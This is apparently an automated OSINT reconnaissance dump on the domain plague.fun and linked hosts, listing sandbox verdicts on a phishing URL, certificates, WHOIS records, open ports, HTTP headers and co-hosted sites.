u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'34.149.204.188', u'172.253.122.95', u'142.251.163.94'], u'sha256': u'cb918fa800dd16d2fa429f0f57ecba53ee3b499d259f9b6b37388e085009756c', u'sha512': u'c4e316542b3c0edd73a72152a44e6bac580835dc052a34e48597f37d16bca44ed996e479de866259ce06a96c1e7d4660a0232afd0b4378784b11d43953f1d6a8', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://portalseguro.jdavivienda.repl.co/', u'submission_id': u'636546f2c8821122f4144206', u'created_at': u'2022-11-04T17:08:02+00:00', u'filename': None}], u'analysis_start_time': u'2022-11-04T17:08:02+00:00', u'tags': [u'phishing'], u'imphash': u'Unknown', u'total_network_connections': 3, u'av_detect': 7, u'machine_learning_models': [], u'total_signatures': 12, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'8f96a7d46dd48cbbbc5299452bb488ff', u'network_mode': u'default', u'processes': [], u'sha1': u'f7a49959ced159445661e0178129a04489bcc166', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': u'Phishing site', u'environment_description': u'Windows 7 64 bit', u'verdict': u'malicious', u'minor_os_version': None, u'domains': [u'portalseguro.jdaviviend 34.149.204.188 2022-12-18 00:03:10 SSL Certificate - Raw Data No Certificate Transparency 0 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 48:20:40:e9:11:6c:46:fc:13:c8:c6:91:95:a6:d1:9b Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 Validity Not Before: Oct 30 20:43:46 2022 GMT Not After : Jan 28 20:43:45 2023 GMT Subject: CN=*.plague.fun 
Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:ba:e1:72:b5:c9:5e:55:dd:88:0b:d7:34:57:98: e0:d5:b8:0e:28:61:25:ee:fa:ac:c2:73:87:c5:9d: fe:ef:08:f9:00:a8:f8:26:a6:f1:1b:9b:b5:8f:d9: fc:63:ed:9a:90:93:9d:52:4d:71:01:18:82:17:5b: 61:a2:75:21:9b:b2:9e:fe:5b:be:9c:5d:18:75:97: 55:08:68:f5:67:68:86:06:e9:5b:b5:42:4b:48:f6: ee:05:0b:99:62:c8:a8:74:e0:4e:70:4b:74:83:ae: 55:b3:01:a0:7f:8e:72:ee:5b:f9:74:97:45:88:f6: 76:97:a7:c2:e2:21:74:02:5d:8e:41:60:21:73:4b: 5d:c0:c1:a3:c4:58:24:34:8f:e3:34:dd:cf:c9:f0: e2:a0:47:87:d7:29:34:44:40:d1:3f:55:83:ea:dd: 67:59:7a:30:50:01:c3:b6:f3:b2:ca:05:1d:b3:eb: ae:61:b7:f4:13:94:90:a0:b6:54:d6:20:16:e5:01: e8:83:b4:2a:e6:f0:c5:cb:8a:29:3d:89:7c:49:7a: a0:90:63:f7:8f:33:f9:ce:b4:7e:df:d8:16:8b:83: 45:c0:0e:15:01:03:1e:fd:9a:7a:55:d7:64:a7:39: ba:85:2c:c2:81:0f:4c:52:92:21:81:ed:02:f8:dc: 82:6f Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 8D:8C:CC:F4:82:11:E1:FE:38:8C:7A:89:4C:FB:51:C6:26:33:92:56 X509v3 Authority Key Identifier: keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8 Authority Information Access: OCSP - URI:http://ocsp.pki.goog/s/gts1p5/N5PKkvSDEsE CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.11129.2.5.3 X509v3 CRL Distribution Points: Full Name: URI:http://crls.pki.goog/gts1p5/lyHNLHo1elk.crl CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 4a:80:0e:26:2f:d2:cd:b6:d1:0d:19:c4:bb:37:bc:46:15:1b: f5:bd:91:e7:c5:9b:5c:a5:26:35:62:e8:4c:25:8f:60:2b:2c: 44:61:20:fa:5a:c5:4f:fd:a1:ea:2a:de:24:0f:90:61:cd:91: bc:7c:af:fd:e7:f9:1e:6a:94:25:f2:c6:d8:9b:a8:18:73:cc: 
fe:12:71:06:29:0c:f2:c7:31:03:ff:f7:32:36:a6:e0:08:c5: f3:3b:15:4b:8e:ae:1d:b7:ca:a6:39:35:ba:13:10:a0:e9:34: e0:6f:d5:23:60:1d:8b:40:ab:b5:f0:49:7a:a7:15:b6:71:84: 94:b2:73:03:ab:bd:f3:fa:07:20:05:57:e1:98:70:ac:e2:7b: 51:01:c5:43:f3:6b:00:7a:3d:d7:fe:13:99:91:be:3b:91:d7: 9d:a1:a0:39:0d:e1:df:23:d1:74:67:09:b7:3b:42:e6:a1:64: 72:4e:a8:d2:63:8d:85:39:02:cc:c6:bf:b3:0b:36:ed:73:5e: 62:ad:bb:9c:68:f4:47:1b:24:7d:0d:15:6d:18:ac:aa:b2:dd: e7:ae:2e:9b:14:6c:8f:18:20:73:76:a2:06:b8:f0:c1:fd:db: 23:37:01:db:71:02:9f:d6:2a:25:fc:03:cf:20:10:89:84:9a: f7:ac:db:e1 plague.fun 2022-12-18 00:21:54 Open TCP Port No Censys 0 0 2 0 None 104.21.7.179:2082 104.21.7.179 2022-12-18 00:13:56 HTTP Status Code No Web Spider 0 0 2 0 None None https://plague.fun/ 2022-12-18 00:21:51 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b0cb6b7b4e2c4c-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 172.67.137.37 2022-12-18 00:02:52 Domain Whois No Whois 11 0 1 0 None Domain Name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated Date: 2022-10-26T19:30:44Z Creation Date: 2022-07-23T21:21:45Z Registry Expiry Date: 2023-07-23T21:21:45Z Registrar: NameCheap, Inc. 
Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. 
Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. 
Domain name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 0001-01-01T00:00:00.00Z Creation Date: 2022-07-23T21:21:45.57Z Registrar Registration Expiration Date: 2023-07-23T21:21:45.57Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ 
>>> Last update of WHOIS database: 2022-12-17T18:02:52.31Z <<< For more information on Whois status codes, please visit https://icann.org/epp misogyny.wtf
2022-12-18 00:14:32 Country No Country Name Extractor 0 0 3 0 None United States Kansas City, Missouri, MO, United States, US
2022-12-18 00:18:44 Malicious IP Address Yes VirusTotal 0 1 2 0 None VirusTotal [188.114.97.1] https://www.virustotal.com/en/ip-address/188.114.97.1/information/ 188.114.97.1
2022-12-18 00:03:24 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None 179.204.149.34.bc.googleusercontent.com 34.149.204.179
2022-12-18 00:03:24 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None stream.plague.fun
Certificate: Data: Version: 3 (0x2)
Serial Number: 03:05:62:a3:2a:56:6a:d6:e7:de:85:5f:24:ee:fd:d0:9c:8a
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity Not Before: Jun 25 00:45:18 2022 GMT Not After : Sep 23 00:45:17 2022 GMT
Subject: CN=stream.plague.fun
Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Exponent: 65537 (0x10001)
X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment
X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical CA:FALSE
X509v3 Subject Key Identifier: 5D:E4:A6:AA:5A:2B:6A:0A:62:3D:88:7F:B5:09:6F:59:0E:78:37:3B
X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name: DNS:stream.plague.fun
X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org
[RSA modulus, CT precertificate SCT and signature hex omitted]
2022-12-18 00:20:49 Raw Data from RIRs No Censys 0 0 1 0 None {"last_updated_at": "2022-12-01T23:22:41.700Z", "ip": "51.103.210.236", "location_updated_at": "2022-12-18T00:20:46.477571Z", "autonomous_system_updated_at": "2022-12-18T00:20:46.477571Z", "location": {"province": "Zurich", "city": "Zurich", "country": "Switzerland", "coordinates": {"latitude": 47.3682, "longitude": 8.5671}, "registered_country_code": "", "postal_code": "8000", "country_code": "CH", "timezone": "Europe/Zurich", "continent": "Europe"}, "services": [], "autonomous_system": {"bgp_prefix": "51.103.0.0/16", "country_code": "US", "asn": 8075, "name": "MICROSOFT-CORP-MSN-AS-BLOCK", "description": "MICROSOFT-CORP-MSN-AS-BLOCK"}} 51.103.210.236
2022-12-18 00:28:20 Web Framework No Web Framework Identifier 0 0 5 0 None Bootstrap [page stylesheet contents omitted]
2022-12-18 00:25:34 Affiliate - Internet Name No DNS Resolver 0 0 4 0 None lfbn-nic-1-313-175.w90-116.abo.wanadoo.fr 90.116.149.175
2022-12-18 00:21:09 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77b3795e1bf5904c-FRA 188.114.96.0
2022-12-18 00:31:07 Similar Domain Yes TLD Searcher 0 0 1 0 None plague.doctor plague.fun
2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None WaveLAN Network (Net ID: 00:02:2D:03:8E:D3) 37.7803446,-122.3906132
2022-12-18 00:26:58 Affiliate - Company Name No Company Name Extractor 0 0 7 0 None Key-Systems GmbH
Domain Name: dominiando.us
Registry Domain ID: D19621490-US
Registrar WHOIS Server:
Registrar URL: https://key-systems.net
Updated Date: 2022-06-06T00:00:06Z
Creation Date: 2009-04-22T11:21:03Z
Registry Expiry Date: 2023-04-21T23:59:59Z
Registrar: Key-Systems GmbH
Registrar IANA ID: 269
Registrar Abuse Contact Email: abuse@key-systems.net
Registrar Abuse Contact Phone: +49.6894939685
Domain Status: ok https://icann.org/epp#ok
Registry Registrant ID: C19621489-US
Registrant Name: Francesco Pacaccio
Registrant Organization: Dominiando Srl
Registrant Street: Piazzale Clodio 8
Registrant Street:
Registrant Street:
Registrant City: Roma
Registrant State/Province:
Registrant Postal Code: 00195
Registrant Country: IT
Registrant Phone: +39.068072248
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: domini@dominiando.it
Registrant Application Purpose: P1
Registrant Nexus Category: C31/IT
Registry Admin ID: C19621489-US
Admin Name: Francesco Pacaccio
Admin Organization: Dominiando Srl
Admin Street: Piazzale Clodio 8
Admin Street:
Admin Street:
Admin City: Roma
Admin State/Province:
Admin Postal Code: 00195
Admin Country: IT
Admin Phone: +39.068072248
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: domini@dominiando.it
Admin Application Purpose: P1
Admin Nexus Category: C31/IT
Registry Tech ID: C2262438-US
Tech Name: Domain Management
Tech Organization: Dominiando Srl
Tech Street: Piazzale Clodio 8
Tech Street:
Tech Street:
Tech City: Rome
Tech State/Province: IT
Tech Postal Code: 00195
Tech Country: IT
Tech Phone: +39.0680693248
Tech Phone Ext:
Tech Fax: +39.06233200178
Tech Fax Ext:
Tech Email: domini@dominiando.it
Tech Application Purpose: P1
Tech Nexus Category: C31/IT
Name Server: ns.dominiando.it
Name Server: ns.dominiando.asia
Name Server: ns.dominiando.uk
Name Server: ns.dominiando.us
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2022-12-18T00:26:49Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
2022-12-18 00:21:30 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.190.129
2022-12-18 00:02:43 SSL Certificate - Issued to No CertSpotter 1 0 1 0 None CN=hook.plague.fun plague.fun
2022-12-18 00:20:44 Malicious IP on Same Subnet Yes CINS Army List 0 0 2 0 None cinsscore.com [4.224.0.0/12] http://cinsscore.com/list/ci-badguys.txt 4.224.0.0/12
2022-12-18 00:13:51 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None tech@ovh.net
domain: plague.fr
status: ACTIVE
eppstatus: active
hold: NO
holder-c: ANO00-FRNIC
admin-c: ANO00-FRNIC
tech-c: OVH5-FRNIC
registrar: OVH
Expiry Date: 2023-01-30T04:23:37Z
created: 2014-01-30T04:23:37Z
last-update: 2022-01-30T04:35:23Z
source: FRNIC
nserver: dns107.ovh.net
nserver: ns107.ovh.net
source: FRNIC
key1-tag: 10120
key1-algo: 8 [RSASHA256]
key1-dgst-t: 8 [SHA256]
key1-dgst: 5BD52D51E250B4CC173D1D59D9A7F23891B3311873364A4F9B2B612EF4CDDD58
source: FRNIC
registrar: OVH
address: 2 Rue Kellermann
address: 59100 ROUBAIX
country: FR
phone: +33.899701761
fax-no: +33.320200958
e-mail: support@ovh.net
website: http://www.ovh.com
anonymous: No
registered: 1999-10-18T00:00:00Z
source: FRNIC
nic-hdl: ANO00-FRNIC
type: PERSON
contact: Ano Nymous
registrar: OVH
changed: 2019-01-04T14:49:13Z
anonymous: YES
remarks: -------------- WARNING --------------
remarks: While the registrar knows him/her,
remarks: this person chose to restrict access
remarks: to his/her personal data. So PLEASE,
remarks: don't send emails to Ano Nymous. This
remarks: address is bogus and there is no hope
remarks: of a reply.
remarks: -------------- WARNING --------------
obsoleted: NO
eppstatus: associated
eppstatus: active
eligstatus: not identified
reachstatus: not identified
source: FRNIC
nic-hdl: ANO00-FRNIC
type: PERSON
contact: Ano Nymous
registrar: OVH
anonymous: YES
remarks: -------------- WARNING --------------
remarks: While the registrar knows him/her,
remarks: this person chose to restrict access
remarks: to his/her personal data. So PLEASE,
remarks: don't send emails to Ano Nymous. This
remarks: address is bogus and there is no hope
remarks: of a reply.
remarks: -------------- WARNING --------------
obsoleted: NO
eppstatus: associated
eppstatus: active
eligstatus: not identified
reachstatus: not identified
source: FRNIC
nic-hdl: OVH5-FRNIC
type: ORGANIZATION
contact: OVH NET
address: OVH
address: 140, quai du Sartel
address: 59100 Roubaix
country: FR
phone: +33.899701761
e-mail: tech@ovh.net
registrar: OVH
changed: 2022-12-17T20:33:44.519173Z
anonymous: NO
obsoleted: NO
eppstatus: associated
eppstatus: active
eligstatus: not identified
reachstatus: not identified
source: FRNIC
>>> WHOIS request date: 2022-12-18T00:11:10.534955Z <<<
2022-12-18 00:18:42 Web Technology No Tool - WAFW00F 0 0 2 0 None None None webmail.zerotwo-best-waifu.online
2022-12-18 00:06:59 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.gg plague.fun
2022-12-18 00:21:34 Open TCP Port No Censys 0 0 2 0 None 104.21.19.243:443 104.21.19.243
2022-12-18 00:13:55 HTTP Status Code No Web Spider 0 0 2 0 None None http://wasp.plague.fun/inject/TJlP9P7aJ8QTzB98
2022-12-18 00:04:11 SSL Certificate - Raw Data No SSL Certificate Analyzer 0 0 2 0 None
Certificate: Data: Version: 3 (0x2)
Serial Number: 09:6b:82:e9:73:99:94:ba:fd:55:b0:21:db:c7:c8:bf
Signature Algorithm: ecdsa-with-SHA256
Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3
Validity Not Before: Aug 3 00:00:00 2022 GMT Not After : Aug 2 23:59:59 2023 GMT
Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) ASN1 OID: prime256v1 NIST CURVE: P-256
X509v3 extensions: X509v3 Authority Key Identifier: keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F
X509v3 Subject Key Identifier: 18:B9:52:2C:13:17:3E:3A:39:88:53:5C:BD:9C:BE:05:0B:02:25:90
X509v3 Subject Alternative Name: DNS:cdnjs.cloudflare.com, DNS:*.cdnjs.cloudflare.com, DNS:sni.cloudflaressl.com
X509v3 Key Usage: critical Digital Signature
X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points: Full Name: URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl Full Name: URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl
X509v3 Certificate Policies: Policy: 2.23.140.1.2.2 CPS: http://www.digicert.com/CPS
Authority Information Access: OCSP - URI:http://ocsp.digicert.com CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt
X509v3 Basic Constraints: critical CA:FALSE
[EC public key, CT precertificate SCT and signature hex omitted]
188.114.97.1
2022-12-18 00:03:08 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.192 34.149.204.188
2022-12-18 00:09:49 Co-Hosted Site No HackerTarget 0 0 2 0 None backracerebe.tk 172.67.147.230
2022-12-18 00:09:42 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.15:8080 188.114.96.0/24
2022-12-18 00:21:27 Open TCP Port No Censys 0 0 2 0 None 2606:4700:3037::6815:13f3:80 2606:4700:3037::6815:13f3
2022-12-18 00:09:45 Open TCP Port No LeakIX 0 0 2 0 None 188.114.96.9:8443 188.114.96.9
2022-12-18 00:06:31 Company Name No Company Name Extractor 0 0 3 0 None Cloudflare\, Inc. C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com
2022-12-18 00:02:48 Internet Name No grep.app 0 0 1 0 None zerotwo-best-waifu.online zerotwo-best-waifu.online
2022-12-18 00:21:02 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 104.21.28.240
2022-12-18 00:18:40 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.17:8443 188.114.97.0/24
2022-12-18 00:20:36 Netblock Membership No Censys 0 0 1 0 None 137.117.0.0/16 137.117.157.128
2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 101 (Net ID: 00:01:03:7B:E0:44) 37.7803446,-122.3906132
2022-12-18 00:05:16 Account on External Site No Account Finder 0 0 2 0 None Instagram (Category: social) https://instagram.com/rasputain rasputain
2022-12-18 00:27:44 Affiliate - Email Address No E-Mail Address Extractor 0 0 7 0 None abuse@key-systems.net
2022-12-18 00:21:06 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77aed6e0e9451409-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 172.67.147.230
2022-12-18 00:21:13 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77b38adcf9fdbbd4-FRA 188.114.97.0
2022-12-18 00:14:14 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.144:80 188.114.96.0/24
2022-12-18 00:09:39 Co-Hosted Site No HackerTarget 0 0 2 0 None 4719296.com.cdn.cloudflare.net 172.67.147.230
2022-12-18 00:04:47 Malicious IP Address Yes Maltiverse 0 1 2 0 None Maltiverse [172.67.137.37] 172.67.137.37
2022-12-18 00:09:40 Co-Hosted Site No HackerTarget 0 0 2 0 None 95662222i.com 172.67.147.230
2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None MarvellAP8x (Net ID: 00:01:36:16:7E:FB) 37.780462,-122.390564
2022-12-18 00:31:03 Similar Domain - Whois No Whois 2 0 2 0 None
Domain Name: plague.cloud
Registry Domain ID: D9A716FCF9ACE438D92BBF2B661AE6BBB-GDREG
Registrar WHOIS Server: whois-service.virtualcloud.co
Registrar URL: http://sav.com
Updated Date: 2022-02-20T19:19:57Z
Creation Date: 2022-02-15T19:19:57Z
Registry Expiry Date: 2023-02-15T19:19:57Z
Registrar: Sav.com LLC
Registrar IANA ID: 609
Registrar Abuse Contact Email: abuse-contact@sav.com
Registrar Abuse Contact Phone: +1.2132205715
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy Protection
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: IL
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
